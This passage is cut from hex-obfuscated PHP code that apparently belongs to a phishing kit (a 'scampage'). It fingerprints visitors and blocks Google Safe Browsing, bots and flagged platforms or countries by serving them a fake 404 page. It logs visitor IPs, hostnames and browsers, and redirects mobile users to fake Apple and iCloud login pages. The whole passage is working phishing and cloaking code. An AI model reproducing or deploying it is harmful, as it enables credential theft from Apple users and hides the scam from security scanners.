t\x68e\x20re\x71uest\x2e</\x70\x3e\x3c/\x62o\x64y></\x68t\x6dl\x3e");}if(${${"\x47LO\x42A\x4c\x53"}["\x77n\x67m\x79\x6a"]}=="Wi\x6ed\x6fws\x20\x32\x30\x300"){${"\x47\x4cO\x42A\x4c\x53"}["\x79b\x72\x68\x6fk\x61\x6e\x65\x77x"]="\x66i\x6c\x65";$khqaplwt="\x69\x70\x32";${"\x47\x4cO\x42\x41LS"}["\x63i\x6ak\x72\x65"]="cli\x63\x6b";${${"GL\x4fBA\x4c\x53"}["\x79brhok\x61n\x65\x77\x78"]}=fopen("bl\x6fck\x5f\x62ot\x2etxt","\x61");fwrite(${${"GL\x4f\x42AL\x53"}["r\x68y\x78\x73\x69"]}," \x42LO\x43K\x45D\x20\x47OO\x47\x4cE\x20S\x41\x46\x45\x42\x52OW\x53\x49N\x47\x20|| \x75ser-\x61\x67\x65\x6et : ".$_SERVER["H\x54\x54P\x5fU\x53\x45R_\x41G\x45\x4eT"]."\n \x69\x70\x20:\x20".${$khqaplwt}." || ".gmdate("Y-n-d")." ----\x3e ".gmdate("H:\x69:\x73")."\n\n");$mivwld="cl\x69ck";${${"G\x4c\x4f\x42\x41L\x53"}["\x79k\x63s\x6bpt\x78\x70\x74\x6f\x72"]}=fopen("logs/t\x6fta\x6c_\x62o\x74.\x74\x78t","a");fwrite(${$mivwld},"$ip2\x20(\x47oo\x67\x6c\x65 \x53\x61f\x65b\x72\x6fw\x73ing)"."\n");fclose(${${"\x47\x4c\x4f\x42ALS"}["\x63\x69\x6akre"]});header("H\x54\x54P/\x31\x2e\x30\x20404 N\x6f\x74\x20\x46\x6f\x75\x6e\x64");die("<!\x44\x4f\x43TY\x50\x45 HTM\x4c \x50UBLIC\x20\"-//\x49E\x54F//D\x54D HTM\x4c 2.0//E\x4e\">\x3ch\x74\x6dl><h\x65ad><t\x69t\x6ce>4\x304\x20Not\x20\x46oun\x64</\x74\x69\x74le\x3e\x3c/hea\x64><b\x6fd\x79\x3e\x3c\x68\x31\x3e\x4eot \x46\x6fun\x64</h1\x3e<\x70\x3eTh\x65\x20\x72equ\x65s\x74\x65d \x55\x52\x4c\x20wa\x73\x20\x6e\x6ft \x66ound \x6fn thi\x73\x20s\x65r\x76\x65r.</\x70\x3e<p\x3eA\x64di\x74i\x6f\x6e\x61\x6c\x6cy, a 40\x34\x20\x4e\x6ft \x46ou\x6e\x64 e\x72ror w\x61s e\x6e\x63\x6f\x75\x6e\x74e\x72\x65\x64\x20\x77\x68\x69le \x74\x72\x79i\x6e\x67\x20to\x20u\x73e an\x20\x45r\x72\x6fr\x44\x6fcum\x65\x6e\x74\x20\x74\x6f\x20\x68\x61nd\x6ce\x20th\x65 \x72\x65que\x73\x74.\x3c/\x70>\x3c/b\x6f\x64y></\x68\x74m\x6c\x3e");}if(${${"G\x4cOB\x41LS"}["\x77\x6e\x67\x6d\x79\x6a"]}=="Unk\x6e\x6f\x77n\x20\x4f\x53 \x50\x6cat\x66or\x6d"){$nhxjtwjuta="c\x6cic\x6b";${"\x47\x4c\x4f\x42AL\x53"}["yb\x68\x68sxdu\x70\x77"]="\x63\x6c\x69\x63\x6b";${"GLOB\x41LS"}["\x70\x66o\x6a\x70n\x79\x6b\x66\x77\x72"]="\x69\x70\x32";${${"\x47\x4c\x4f\x42A\x4cS"}["\x72h\x79xsi"]}=fopen("bl\x6fc\x6b\x5f\x62o\x74.txt","\x61");fwrite(${${"\x47\x4c\x4fBA\x4c\x53"}["\x72h\x79\x78\x73\x69"]},"\x20B\x4c\x4f\x43KE\x44 G\x4fOGLE S\x41F\x45BR\x4f\x57SING\x20||\x20us\x65\x72-age\x6et :\x20".$_SERVER["H\x54\x54\x50\x5fUSE\x52_\x41G\x45N\x54"]."\n\x20i\x70 :\x20".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["pfoj\x70\x6ey\x6b\x66\x77\x72"]}." ||\x20".gmdate("\x59-n-d")." ----\x3e\x20".gmdate("H:i:s")."\n\n");${${"\x47L\x4fBAL\x53"}["ybh\x68\x73x\x64u\x70\x77"]}=fopen("lo\x67s/\x74ota\x6c_\x62\x6ft.\x74\x78t","a");fwrite(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x79k\x63\x73\x6bp\x74x\x70to\x72"]},"$ip2\x20(\x47\x6f\x6fgl\x65\x20Sa\x66\x65\x62r\x6f\x77si\x6e\x67)"."\n");fclose(${$nhxjtwjuta});header("H\x54\x54P/1\x2e0\x20\x34\x304 \x4eo\x74\x20\x46\x6f\x75n\x64");die("<\x21D\x4fCTY\x50E \x48TM\x4c \x50\x55\x42\x4cIC\x20\x22-//IET\x46//\x44TD HT\x4dL 2.\x30//EN\x22>\x3chtml\x3e<\x68ead><\x74it\x6ce>\x3404 No\x74 F\x6f\x75nd</\x74\x69tl\x65>\x3c/h\x65\x61\x64\x3e<\x62o\x64y><\x681\x3e\x4eot \x46\x6fu\x6ed\x3c/\x68\x31><\x70\x3e\x54he\x20r\x65ques\x74ed \x55R\x4c \x77a\x73 \x6eo\x74 \x66\x6fu\x6e\x64\x20on\x20t\x68\x69s \x73\x65rv\x65r\x2e\x3c/\x70\x3e\x3c\x70>\x41\x64di\x74\x69\x6f\x6e\x61\x6cl\x79,\x20a \x340\x34 N\x6f\x74\x20\x46\x6fund \x65\x72r\x6fr\x20wa\x73\x20e\x6e\x63o\x75n\x74\x65\x72ed whi\x6c\x65\x20\x74\x72yin\x67 t\x6f\x20us\x65\x20an E\x72\x72orDo\x63u\x6d\x65\x6et\x20\x74o \x68an\x64l\x65\x20th\x65\x20re\x71\x75\x65\x73t.\x3c/\x70\x3e</\x62od\x79>\x3c/\x68tml>");}if(${$qenugsdveelo}["\x6c\x6fc\x6b\x5fp\x6ca\x74f\x6frm"]=="\x6f\x6e"){$ftscyxqoucnv="\x6f\x73";$budbpoqr="\x6f\x73";if(${${"GL\x4fB\x41\x4c\x53"}["w\x6e\x67my\x6a"]}=="i\x50ho\x6e\x65"or${$ftscyxqoucnv}=="i\x50a\x64"or${${"\x47LOB\x41\x4c\x53"}["\x77\x6e\x67\x6d\x79\x6a"]}=="\x69P\x6fd"or${$budbpoqr}=="Mac\x20O\x53\x20X"or${${"G\x4c\x4f\x42\x41LS"}["w\x6e\x67\x6d\x79j"]}=="Mac\x20\x4fS\x209"){}else{${"\x47LO\x42\x41\x4cS"}["\x69kj\x6bm\x62\x6c"]="fil\x65";${${"\x47\x4cO\x42\x41LS"}["\x79\x6b\x63s\x6b\x70\x74\x78\x70\x74o\x72"]}=fopen("logs/\x6c\x6f\x67_v\x69\x73\x69t\x6fr\x2e\x74\x78t","a");${"\x47\x4cO\x42ALS"}["t\x69j\x70\x71m\x6c\x6d\x78\x71"]="\x63l\x69c\x6b";fwrite(${${"\x47\x4c\x4fBA\x4c\x53"}["ti\x6a\x70\x71\x6d\x6c\x6d\x78\x71"]},"[$ip2\x20-\x20$br\x20- $os] G\x61g\x61l\x20\x4dasu\x6b\x20Lo\x63k\x20Pl\x61\x74\x66or\x6d"."\n");$lhqciek="fi\x6c\x65";${"\x47\x4cO\x42A\x4c\x53"}["\x78\x73\x68\x72\x72q\x6f"]="\x63\x6c\x69\x63\x6b";fclose(${${"\x47\x4cO\x42AL\x53"}["y\x6b\x63\x73\x6bpt\x78pt\x6fr"]});${${"\x47L\x4f\x42\x41L\x53"}["\x69k\x6a\x6bm\x62l"]}=fopen("b\x6c\x6f\x63k_bo\x74.\x74xt","a");fwrite(${$lhqciek}," B\x4cO\x43K\x45D L\x4fCK \x50\x4cATFO\x52\x4d || \x75s\x65r-a\x67\x65\x6et :\x20".$_SERVER["\x48TT\x50\x5fU\x53ER\x5f\x41\x47\x45\x4e\x54"]."\n i\x70 :\x20".${${"\x47\x4c\x4fB\x41\x4cS"}["\x72\x75\x6d\x79u\x67k\x6c\x76"]}."\x20|| ".gmdate("\x59-n-\x64")." ----\x3e ".gmdate("H:\x69:\x73")."\n\n");$tehvtdzwg="\x63\x6c\x69\x63k";${${"\x47L\x4f\x42A\x4c\x53"}["x\x73\x68\x72\x72\x71o"]}=fopen("\x6co\x67\x73/\x74\x6ft\x61l_\x62\x6f\x74.\x74\x78\x74","\x61");fwrite(${$tehvtdzwg},"$ip2 (\x4c\x6fc\x6b P\x6c\x61\x74f\x6frm)"."\n");fclose(${${"G\x4c\x4f\x42A\x4c\x53"}["y\x6b\x63\x73kp\x74\x78\x70\x74o\x72"]});header("H\x54\x54\x50/\x31.0\x204\x30\x34 \x4e\x6ft\x20F\x6f\x75\x6ed");die("<!\x44\x4f\x43\x54\x59\x50E \x48T\x4d\x4c\x20P\x55\x42\x4cIC \"-//\x49\x45\x54F//\x44T\x44\x20HTML 2.\x30//EN\x22>\x3c\x68tm\x6c><\x68\x65\x61d\x3e<\x74\x69tle\x3e4\x304 \x4eo\x74 \x46o\x75nd\x3c/tit\x6c\x65\x3e</\x68e\x61\x64\x3e<bod\x79\x3e\x3ch\x31\x3eNo\x74 F\x6f\x75n\x64\x3c/h1><\x70\x3e\x54he\x20r\x65\x71ue\x73t\x65\x64\x20\x55\x52L\x20was\x20\x6eo\x74\x20\x66ound on\x20t\x68i\x73\x20se\x72\x76er.</p>\x3c\x70\x3e\x41\x64d\x69\x74ion\x61l\x6c\x79,\x20\x61 40\x34\x20N\x6f\x74 F\x6fu\x6ed\x20\x65r\x72\x6f\x72 \x77as \x65n\x63o\x75ntere\x64 \x77hi\x6c\x65\x20t\x72yi\x6eg t\x6f\x20\x75se\x20an E\x72r\x6f\x72Do\x63\x75ment\x20to \x68\x61ndl\x65\x20\x74h\x65\x20\x72eq\x75est\x2e</\x70>\x3c/b\x6fd\x79\x3e</h\x74m\x6c>");}}str_replace(${${"\x47L\x4f\x42A\x4c\x53"}["\x76\x73\x74\x6ak\x6e"]},"\x6e\x65\x6d\x75",${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62\x6a\x78\x67\x72\x65"]},${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x6d\x69\x6d\x67w\x78\x74\x72\x74"]});if(${$kccctorp}=="\x6fn"&&${${"G\x4c\x4fB\x41L\x53"}["j\x6d\x69\x6d\x67\x77x\x74r\x74"]}==0){$lgbqrjgw="\x63\x6c\x69\x63\x6b";$pjszwirl="\x63\x6c\x69c\x6b";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x79\x6b\x63\x73\x6bptx\x70\x74\x6f\x72"]}=fopen("\x6cog\x73/tot\x61\x6c_bot.\x74x\x74","a");fwrite(${$pjszwirl},"$ip\x20-\x20$ua (\x44et\x65\x63t F\x69lt\x65\x72 L\x6f\x63k\x20\x43oun\x74ry"."\n");fclose(${$lgbqrjgw});header("HT\x54\x50/\x31.\x30\x20\x340\x34\x20N\x6ft \x46ou\x6e\x64");die("<\x21D\x4fC\x54YP\x45 \x48\x54\x4dL P\x55BLIC \x22-//IE\x54\x46//DTD \x48TM\x4c 2\x2e0//\x45N\x22\x3e<h\x74\x6d\x6c>\x3c\x68\x65\x61\x64>\x3ct\x69tl\x65\x3e\x34\x30\x34 N\x6ft\x20\x46\x6f\x75\x6ed\x3c/\x74it\x6ce>\x3c/\x68ead\x3e\x3c\x62ody\x3e\x3c\x681\x3e\x4eot \x46\x6f\x75nd\x3c/h\x31\x3e<p\x3e\x54he req\x75\x65s\x74ed U\x52L \x77\x61\x73\x20n\x6f\x74\x20\x66o\x75\x6e\x64\x20o\x6e \x74\x68\x69s s\x65\x72v\x65r\x2e</\x70\x3e<\x70\x3e\x41d\x64i\x74\x69o\x6eall\x79,\x20\x61 \x340\x34 \x4eot F\x6f\x75\x6e\x64\x20\x65rro\x72 \x77\x61\x73 en\x63ou\x6e\x74\x65re\x64 wh\x69\x6c\x65\x20\x74\x72\x79i\x6e\x67\x20\x74\x6f\x20u\x73\x65\x20\x61n E\x72ror\x44o\x63\x75\x6d\x65n\x74\x20\x74o\x20hand\x6c\x65 t\x68\x65\x20\x72\x65ques\x74.\x3c/p\x3e\x3c/\x62\x6f\x64y\x3e\x3c/\x68tm\x6c>");}if(${${"\x47\x4cO\x42AL\x53"}["l\x78i\x73\x6aow\x64\x6e\x72"]}["\x73\x69te_\x70ar\x61m\x5f\x6fn"]=="\x6f\x6e"){$wvuthrj="secr\x65\x74";${"\x47LO\x42A\x4cS"}["\x76grvrl\x7a\x65\x6f\x6c\x6d"]="p\x61s\x73w\x6fr\x64";$ehhnmrqrc="\x70\x61s\x73\x77o\x72\x64";$itxojsggurkz="\x73\x65\x63\x72et";${$wvuthrj}=${${"\x47LO\x42\x41L\x53"}["\x6cx\x69\x73\x6a\x6f\x77\x64nr"]}["s\x69te_pa\x72\x61m\x65t\x65r"];${${"G\x4c\x4f\x42\x41L\x53"}["v\x67\x72\x76\x72l\x7a\x65o\x6c\x6d"]}=$_GET[${$itxojsggurkz}];if(!isset(${$ehhnmrqrc})){$yyvimpvvrvcb="f\x69\x6c\x65";${"\x47L\x4f\x42AL\x53"}["\x65\x77\x62\x72\x6de\x75\x6a\x75\x69dn"]="\x6aa\x6d";${${"G\x4c\x4f\x42\x41L\x53"}["\x79k\x63\x73kp\x74\x78\x70\x74\x6f\x72"]}=fopen("log\x73/l\x6f\x67\x5fv\x69\x73\x69\x74o\x72\x2etx\x74","\x61");${${"\x47L\x4f\x42\x41LS"}["\x65\x77\x62\x72m\x65\x75\x6a\x75i\x64\x6e"]}=date("\x68:\x69:s\x61");fwrite(${${"GL\x4fBA\x4c\x53"}["\x79\x6b\x63s\x6b\x70\x74\x78p\x74\x6fr"]},"[$jam\x20- $ip2 - $cn\x20-\x20$br\x20- $os] A\x64a \x62\x6ft (G\x61\x67al\x20\x4da\x73\x75\x6b\x20S\x69\x74\x65\x20P\x61r\x61\x6d\x65\x74\x65\x72)"."\n");$gxysis="c\x6c\x69\x63k";fclose(${${"GLO\x42\x41L\x53"}["yk\x63\x73\x6bpt\x78\x70\x74\x6f\x72"]});${${"G\x4c\x4f\x42AL\x53"}["\x72\x68y\x78\x73\x69"]}=fopen("\x62lo\x63\x6b_bo\x74\x2e\x74xt","a");fwrite(${$yyvimpvvrvcb},"\x20\x42LOCK\x45D\x20BOT\x20\x49N\x44\x45X ||\x20\x75\x73\x65\x72-a\x67ent\x20:\x20".$_SERVER["H\x54\x54\x50\x5fU\x53\x45\x52_\x41\x47\x45\x4e\x54"]."\n \x69\x70\x20: ".${${"\x47LO\x42\x41L\x53"}["e\x6dn\x76r\x63gr"]}."\x20|| ".gmdate("\x59-n-d")."\x20----\x3e ".gmdate("\x48:i:\x73")."\n\n");${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x79k\x63s\x6bpt\x78\x70\x74\x6f\x72"]}=fopen("lo\x67s/tot\x61\x6c_\x62ot.txt","a");fwrite(${${"\x47\x4cO\x42\x41L\x53"}["yk\x63\x73\x6b\x70\x74\x78p\x74\x6f\x72"]},"$ip2\x20(B\x6ft\x20S\x65\x72ve\x72)"."\n");fclose(${$gxysis});header("\x48\x54\x54P/1\x2e\x30 \x340\x34 \x4eot\x20\x46\x6f\x75\x6e\x64");die("<\x21\x44\x4f\x43T\x59\x50E H\x54ML\x20\x50\x55B\x4c\x49C\x20\x22-//I\x45\x54F//\x44T\x44 HTML\x202.0//EN\x22><h\x74\x6dl\x3e\x3c\x68\x65a\x64>\x3cti\x74le>\x3404 \x4e\x6ft\x20F\x6fun\x64</\x74\x69t\x6ce\x3e</hea\x64\x3e<bo\x64\x79\x3e\x3c\x681\x3e\x4e\x6ft F\x6fu\x6ed\x3c/h\x31><\x70\x3eT\x68\x65 r\x65q\x75e\x73te\x64\x20UR\x4c\x20\x77as\x20\x6eot\x20fou\x6ed\x20\x6fn \x74\x68is\x20\x73erve\x72\x2e\x3c/p>\x3c\x70\x3e\x41\x64di\x74i\x6fnal\x6cy, \x61 \x34\x30\x34 N\x6f\x74\x20\x46\x6f\x75\x6ed \x65r\x72\x6f\x72 \x77as \x65nc\x6f\x75n\x74\x65re\x64 \x77h\x69\x6ce\x20\x74\x72\x79\x69ng t\x6f\x20\x75\x73\x65 an E\x72\x72orDocumen\x74 t\x6f ha\x6e\x64\x6ce \x74\x68\x65\x20\x72\x65q\x75est\x2e</p\x3e\x3c/\x62\x6fdy></\x68tml\x3e");}else{${"\x47L\x4f\x42A\x4cS"}["yoldg\x75\x64"]="\x73\x65\x74\x74i\x6e\x67";${"G\x4c\x4fB\x41\x4c\x53"}["c\x6a\x61\x76c\x68x\x78\x62\x74"]="c\x6cic\x6b";${"\x47\x4cO\x42\x41\x4c\x53"}["\x77i\x6eu\x74\x66\x65\x69"]="\x6a\x61m";${"\x47L\x4f\x42\x41\x4c\x53"}["m\x6a\x75\x62\x71\x65"]="\x69\x70\x32";$gcwnqnbyxj="s\x74\x61\x74\x75\x73";$yvigrqed="c\x6c\x69\x63\x6b";${${"\x47\x4cO\x42\x41LS"}["f\x77\x75\x63m\x75x\x70\x6e"]}=substr(sha1(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6d\x6aub\x71e"]}."\x70ew\x6b\x6fk"),0,15);${$yvigrqed}=fopen("log\x73/l\x6f\x67_\x76is\x69\x74o\x72.\x74xt","\x61");${${"\x47\x4c\x4f\x42\x41LS"}["wi\x6e\x75tf\x65\x69"]}=date("\x68:\x69:sa");fwrite(${${"G\x4c\x4f\x42\x41L\x53"}["\x79k\x63s\x6b\x70\x74\x78\x70\x74\x6f\x72"]},"[$jam\x20- $ip2\x20-\x20$cn\x20-\x20$br\x20- $os]\x20Me\x6e\x67\x75\x6e\x6a\x75n\x67\x69 \x53ca\x6dp\x61\x67e"."\n");${"\x47L\x4f\x42ALS"}["v\x68e\x70h\x78\x6e\x75\x68\x70"]="\x69p\x32";${"\x47LOBA\x4c\x53"}["e\x68\x67\x79i\x64\x73\x76\x6e\x68\x6b\x75"]="\x66i\x6c\x65";fclose(${${"\x47\x4c\x4fB\x41L\x53"}["\x63\x6aa\x76\x63\x68\x78xb\x74"]});${${"GLO\x42\x41L\x53"}["\x63h\x71\x6et\x6bd"]}=$_SERVER["HT\x54P_\x55SER\x5f\x41\x47\x45N\x54"];${${"\x47\x4c\x4f\x42\x41L\x53"}["\x65h\x67\x79i\x64\x73vnh\x6b\x75"]}=fopen("i\x70.txt","a");$vcbithegdy="\x73\x74\x61t\x75\x73";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x67u\x78\x62\x79a\x67\x71\x7a\x6d"]}=gethostbyaddr($_SERVER["RE\x4d\x4fTE\x5f\x41\x44\x44\x52"]);${"GL\x4f\x42\x41\x4cS"}["\x62u\x7a\x6a\x6e\x70\x74\x74\x78\x77\x73\x7a"]="\x66\x69l\x65";fwrite(${${"G\x4cOBA\x4c\x53"}["\x62\x75\x7ajn\x70\x74\x74\x78wsz"]},${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76\x68\x65\x70hx\x6e\x75\x68\x70"]}."\x20 - \x20$hostname ($ispnya)\x20\x3e> [$cn |\x20$os\x20|\x20$br\x20| $ua] \n");fclose(${${"\x47\x4c\x4fB\x41L\x53"}["\x72\x68\x79xsi"]});${$vcbithegdy}=${${"G\x4c\x4f\x42\x41LS"}["\x79\x6f\x6c\x64\x67\x75d"]}["e\x72ro\x72\x5fc\x6f\x64\x65"];${"\x47\x4c\x4fB\x41\x4c\x53"}["l\x61m\x78t\x67b\x6bo"]="setti\x6eg";${"\x47\x4cO\x42AL\x53"}["j\x6d\x69x\x61e\x73\x6f\x71\x73"]="\x6d\x6f\x62i\x6ceal\x6c";${${"GLO\x42\x41\x4c\x53"}["g\x76\x69\x75r\x78\x77\x6cvp\x6d"]}=${${"\x47L\x4f\x42AL\x53"}["l\x78\x69s\x6a\x6fw\x64\x6e\x72"]}["\x6d\x6f\x62i\x6ce\x5f\x64e\x76\x69c\x65\x73"];$_SESSION["\x73\x74\x61tu\x73"]=${$gcwnqnbyxj};if(${${"GL\x4f\x42A\x4c\x53"}["\x6a\x6d\x69x\x61\x65\x73\x6fq\x73"]}=="\x6fn"){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x72v\x6d\x6b\x64\x6cb\x76p\x66"]="u\x73erag\x65\x6et";${${"G\x4c\x4fB\x41L\x53"}["\x70\x62\x73\x68\x78\x6ds\x62\x70\x6e"]}=$_SERVER["HTTP\x5f\x55S\x45\x52_AGEN\x54"];if(preg_match("/(an\x64r\x6fi\x64|\x62b\\\x64+|\x6d\x65\x65\x67o).+m\x6f\x62\x69\x6c\x65|a\x76\x61\x6e\x74\x67\x6f|\x62\x61da\\/|b\x6cack\x62\x65\x72ry|blazer|\x63\x6fmp\x61\x6c|el\x61i\x6ee|fe\x6en\x65\x63|hipt\x6fp|\x69\x65\x6d\x6fbi\x6c\x65|ip(hone|o\x64)|i\x72\x69\x73|k\x69n\x64\x6ce|lg\x65 |ma\x65mo|mid\x70|\x6d\x6dp|\x6e\x65t\x66\x72\x6f\x6et|\x6fp\x65\x72a \x6d(\x6fb|\x69\x6e)i|palm(\x20\x6fs)?|p\x68o\x6e\x65|\x69pad|p(i\x78i|\x72\x65)\x5c/|p\x6cuc\x6be\x72|\x70oc\x6bet|p\x73p|se\x72i\x65\x73(\x34|6)0|\x73\x79\x6d\x62i\x61\x6e|\x74r\x65\x6f|up\x5c\x2e(\x62r\x6fws\x65\x72|\x6cink)|vo\x64\x61\x66\x6f\x6ee|wa\x70|\x77\x69\x6edows (ce|\x70\x68o\x6ee)|\x78d\x61|xiin\x6f/i",${${"\x47\x4c\x4fBALS"}["\x70b\x73\x68\x78\x6ds\x62\x70n"]})||preg_match("/1\x32\x30\x37|6\x3310|\x36\x35\x39\x30|3g\x73\x6f|4\x74hp|5\x30[\x31-\x36]i|7\x37\x30s|802\x73|a\x20\x77a|\x61ba\x63|\x61\x63(\x65r|\x6f\x6f|s\x5c-)|a\x69(\x6b\x6f|\x72n)|a\x6c(av|ca|\x63\x6f)|am\x6f\x69|\x61\x6e(\x65x|ny|y\x77)|apt\x75|a\x72(ch|\x67o)|\x61s(te|\x75s)|\x61t\x74w|a\x75(di|\x5c-m|r |s\x20)|\x61\x76a\x6e|\x62\x65(\x63k|\x6cl|\x6e\x71)|b\x69(\x6c\x62|r\x64)|bl(\x61\x63|\x61\x7a)|br(\x65|\x76)w|\x62u\x6d\x62|\x62w\x5c-(\x6e|\x75)|c\x355\x5c/|\x63api|\x63c\x77\x61|c\x64\x6d\\-|c\x65\x6c\x6c|\x63ht\x6d|c\x6cd\x63|c\x6d\x64\x5c-|\x63\x6f(\x6dp|n\x64)|\x63\x72a\x77|da(\x69\x74|ll|n\x67)|d\x62\x74\x65|dc\\-\x73|d\x65\x76i|\x64\x69c\x61|dm\x6fb|do(c|p)o|\x64s(\x31\x32|\x5c-\x64)|e\x6c(4\x39|\x61\x69)|\x65m(\x6c\x32|\x75l)|\x65\x72(i\x63|k0)|e\x73\x6c8|e\x7a([4-7]\x30|os|w\x61|z\x65)|\x66e\x74c|f\x6cy(\\-|_)|\x67\x31\x20\x75|\x67\x3560|\x67ene|gf\\-5|g\\-\x6d\x6f|\x67o(\\.w|\x6fd)|\x67r(\x61d|u\x6e)|ha\x69e|\x68c\x69t|h\x64\\-(\x6d|\x70|\x74)|he\x69\x5c-|\x68\x69(\x70t|\x74\x61)|\x68\x70( i|ip)|\x68s\x5c-\x63|ht(c(\\-| |_|\x61|\x67|p|\x73|t)|t\x70)|\x68\x75(\x61\x77|tc)|i\x5c-(\x32\x30|\x67o|\x6da)|i\x32\x330|\x69\x61\x63( |\x5c-|\\/)|\x69b\x72o|i\x64\x65\x61|\x69g0\x31|i\x6bom|im1\x6b|\x69\x6en\x6f|i\x70\x61q|\x69\x72i\x73|\x6a\x61(\x74|v)a|jbro|\x6a\x65\x6d\x75|ji\x67\x73|kd\x64i|\x6beji|kgt( |\x5c/)|klo\x6e|k\x70t |\x6bwc\x5c-|k\x79\x6f(\x63|\x6b)|l\x65(no|\x78i)|\x6c\x67(\x20g|\\/(\x6b|\x6c|u)|\x350|\x35\x34|\x5c-[a-\x77])|\x6ci\x62w|\x6c\x79\x6ex|\x6d1\\-w|\x6d3ga|\x6d50\\/|m\x61(\x74e|u\x69|x\x6f)|mc(\x30\x31|\x321|\x63\x61)|\x6d\\-\x63\x72|m\x65(r\x63|\x72\x69)|\x6di(\x6f8|o\x61|t\x73)|m\x6de\x66|m\x6f(01|\x302|bi|\x64\x65|\x64\x6f|t(\x5c-|\x20|o|v)|\x7a\x7a)|\x6dt(\x350|\x701|v\x20)|m\x77bp|\x6d\x79\x77\x61|\x6e1\x30[\x30-2]|\x6e\x32\x30[\x32-3]|\x6e30(0|2)|\x6e5\x30(\x30|2|\x35)|\x6e7(0(0|1)|\x31\x30)|\x6ee((c|\x6d)\\-|on|tf|\x77\x66|\x77\x67|\x77\x74)|\x6eo\x6b(6|i)|\x6ez\x70\x68|o\x32im|op(\x74i|\x77v)|\x6f\x72\x61\x6e|\x6fwg\x31|\x70\x38\x300|p\x61n(a|\x64|\x74)|pd\x78\x67|\x70\x67(\x31\x33|\\-([1-\x38]|c))|p\x68il|\x70\x69r\x65|\x70\x6c(\x61\x79|\x75\x63)|\x70n\\-\x32|po(c\x6b|\x72t|se)|\x70r\x6fx|\x70\x73i\x6f|\x70\x74\\-g|q\x61\x5c-a|qc(07|\x312|2\x31|\x33\x32|60|\x5c-[\x32-\x37]|\x69\x5c-)|\x71\x74\x65k|\x72\x33\x380|\x72\x360\x30|\x72a\x6b\x73|\x72i\x6d\x39|\x72o(\x76\x65|z\x6f)|\x73\x35\x35\x5c/|\x73\x61(\x67e|m\x61|\x6dm|\x6ds|\x6e\x79|v\x61)|sc(01|\x68\x5c-|o\x6f|\x70\x5c-)|\x73\x64k\x5c/|\x73\x65(\x63(\x5c-|0|\x31)|47|m\x63|n\x64|r\x69)|sgh\x5c-|\x73har|sie(\\-|m)|\x73\x6b\\-0|sl(\x345|\x69\x64)|sm(\x61l|ar|b\x33|i\x74|t5)|\x73o(f\x74|\x6e\x79)|sp(01|\x68\\-|\x76\\-|v\x20)|\x73y(0\x31|m\x62)|\x742(\x318|50)|\x74\x36(\x30\x30|\x31\x30|18)|\x74\x61(\x67\x74|l\x6b)|tcl\\-|td\x67\\-|\x74el(i|m)|ti\x6d\\-|\x74\x5c-mo|\x74\x6f(\x70l|sh)|\x74\x73(\x37\x30|\x6d\x5c-|\x6d3|m\x35)|tx\\-\x39|u\x70(\\.b|g1|s\x69)|u\x74\x73\x74|v40\x30|\x767\x35\x30|ve\x72\x69|vi(rg|\x74e)|\x76k(40|\x35[0-\x33]|\x5c-v)|vm4\x30|\x76o\x64a|vul\x63|\x76\x78(\x35\x32|\x35\x33|\x360|61|\x370|\x38\x30|\x38\x31|8\x33|8\x35|\x39\x38)|\x77\x33\x63(\\-|\x20)|w\x65\x62\x63|\x77\x68\x69t|\x77i(g |n\x63|\x6ew)|\x77m\x6c\x62|won\x75|\x78\x370\x30|y\x61\x73\x5c-|\x79\x6f\x75\x72|z\x65\x74o|zte\x5c-/\x69",substr(${${"\x47\x4cO\x42\x41L\x53"}["\x72\x76m\x6b\x64\x6cb\x76\x70\x66"]},0,4))){$xrhdsij="\x73\x65\x74\x74\x69\x6e\x67";$uruslowhpeqd="s\x65\x74\x74\x69\x6eg";if(${$xrhdsij}["th\x65\x6de"]=="\x61ppl\x65"){$mbdqthdujj="k\x65\x79";echo"<s\x63ri\x70t ty\x70\x65\x3d\x27\x74ext/\x6a\x61\x76\x61scr\x69p\x74'>\x77\x69\x6e\x64ow\x2e\x74op\x2elo\x63ati\x6f\x6e='s\x65ssio\x6e/?v\x69ew=\x6co\x67\x69n&\x61ppI\x64\x4b\x65\x79\x3d".${$mbdqthdujj}."&co\x75nt\x72\x79=".${${"G\x4c\x4fBA\x4cS"}["vs\x74\x6a\x6b\x6e"]}."\x27\x3b</s\x63ri\x70\x74\x3e";}else if(${$uruslowhpeqd}["\x74\x68\x65\x6d\x65"]=="i\x63lo\x75d"){$miilpbfhv="\x63\x69\x64";echo"<\x73\x63ript\x20\x74\x79pe\x3d\x27text/\x6a\x61v\x61\x73cript\x27\x3ewindo\x77.to\x70.\x6c\x6fc\x61\x74\x69o\x6e=\x27\x73e\x73sio\x6e/?vie\x77\x3di\x63\x6c\x6f\x75\x64\x26a\x70p\x49\x64Ke\x79\x3d".${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66\x77u\x63m\x75\x78\x70n"]}."\x26\x63ou\x6et\x72\x79\x3d".${$miilpbfhv}."\x27\x3b</s\x63r\x69p\x74>";}else{${"\x47\x4c\x4f\x42\x41LS"}["r\x6c\x79q\x67\x6e\x71"]="cid";echo"\x3c\x73\x63\x72ip\x74 \x74ype\x3d\x27t\x65x\x74/j\x61\x76a\x73\x63r\x69\x70t'\x3e\x77i\x6ed\x6fw.\x74\x6fp.\x6c\x6f\x63\x61t\x69o\x6e='\x73es\x73i\x6fn/?\x76iew=\x63\x6ca\x73\x73\x69c&\x61p\x70I\x64\x4b\x65y\x3d".${${"\x47LO\x42\x41\x4cS"}["fw\x75c\x6d\x75\x78p\x6e"]}."\x26c\x6f\x75\x6et\x72\x79\x3d".${${"\x47LO\x42A\x4c\x53"}["\x72\x6c\x79\x71\x67\x6eq"]}."';</\x73crip\x74>";}}else{$tjpsqlyrpl="c\x6cic\x6b";${$tjpsqlyrpl}=fopen("log\x73/tota\x6c_bo\x74.t\x78t","a");fwrite(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x79\x6bc\x73\x6b\x70\x74x\x70t\x6f\x72"]},"$ip - $ua\x20(D\x65te\x63t\x20b\x79\x20\x50C\x20(Mob\x69le\x20Only 